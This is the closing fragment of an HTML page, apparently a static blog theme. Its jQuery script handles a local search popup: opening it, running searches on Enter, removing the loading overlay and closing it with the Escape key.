            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
